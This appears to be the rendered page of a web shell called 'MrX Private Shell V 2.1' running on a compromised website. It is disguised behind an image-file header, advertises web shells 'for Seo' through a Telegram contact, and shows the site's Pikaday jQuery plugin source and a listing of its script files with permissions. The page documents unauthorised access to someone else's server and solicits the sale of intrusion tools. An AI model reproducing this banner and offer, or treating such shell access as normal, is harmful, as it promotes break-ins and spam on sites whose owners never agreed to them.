����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/*!
* Pikaday jQuery plugin.
*
* Copyright © 2013 David Bushell | BSD & MIT license | https://github.com/dbushell/Pikaday
*/
(function (root, factory)
{
'use strict';
if (typeof exports === 'object') {
// CommonJS module
factory(require('jquery'), require('pikaday'));
} else if (typeof define === 'function' && define.amd) {
// AMD. Register as an anonymous module.
define(['jquery', 'pikaday'], factory);
} else {
// Browser globals
factory(root.jQuery, root.Pikaday);
}
}(this, function ($, Pikaday)
{
'use strict';
$.fn.pikaday = function()
{
var args = arguments;
if (!args || !args.length) {
args = [{ }];
}
return this.each(function()
{
var self = $(this),
plugin = self.data('pikaday');
if (!(plugin instanceof Pikaday)) {
if (typeof args[0] === 'object') {
var options = $.extend({}, args[0]);
options.field = self[0];
self.data('pikaday', new Pikaday(options));
}
} else {
if (typeof args[0] === 'string' && typeof plugin[args[0]] === 'function') {
plugin[args[0]].apply(plugin, Array.prototype.slice.call(args,1));
if (args[0] === 'destroy') {
self.removeData('pikaday');
}
}
}
});
};
}));
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| imagesloaded.pkgd.js | File | 27.57 KB | 0644 |
|
| imagesloaded.pkgd.min.js | File | 8.2 KB | 0644 |
|
| isotope.pkgd.js | File | 88.96 KB | 0644 |
|
| isotope.pkgd.min.js | File | 34.73 KB | 0644 |
|
| jquery.fitvids.js | File | 3.27 KB | 0644 |
|
| jquery.fitvids.min.js | File | 2.01 KB | 0644 |
|
| lottie-player.js | File | 337.32 KB | 0644 |
|
| lottie-player.min.js | File | 336.85 KB | 0644 |
|
| packery.pkgd.js | File | 83.31 KB | 0644 |
|
| packery.pkgd.min.js | File | 33.2 KB | 0644 |
|
| pikaday.css | File | 4.46 KB | 0644 |
|
| pikaday.jquery.js | File | 1.5 KB | 0644 |
|
| pikaday.jquery.min.js | File | 738 B | 0644 |
|
| pikaday.js | File | 39.31 KB | 0644 |
|
| pikaday.min.js | File | 15.19 KB | 0644 |
|
| slick.js | File | 86.67 KB | 0644 |
|
| slick.min.js | File | 42.02 KB | 0644 |
|